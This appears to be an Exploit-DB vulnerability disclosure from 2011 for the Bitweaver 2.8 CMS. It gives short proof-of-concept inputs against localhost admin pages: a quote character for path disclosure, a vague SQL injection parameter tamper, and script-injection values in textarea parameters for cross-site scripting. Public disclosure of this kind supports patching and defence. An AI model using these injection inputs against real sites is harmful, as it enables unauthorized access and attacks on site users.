Bitweaver 2.8.0 - Multiple Vulnerabilities

Author: lemlajt
type: webapps
platform: php
port: 
date_added: 2011-03-02 
date_updated: 2011-03-02 
verified: 0 
codes: OSVDB-71120;OSVDB-71119;OSVDB-71116 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combitweaver2.8.1.zip

# exploit title: Path Disclosure bitweaver 2.8
# date: 25.o2.2o11
# author: lemlajt
# software : bitweaver
# version: 2.8
# tested on: linux
# cve :
#

Path Disclosure bitweaver 2.8
PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27

sql injection in bitweaver 2.8
PoC :
1. Goto:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc

2. Data Tamper:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =


bonus: xss
POST
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>

# *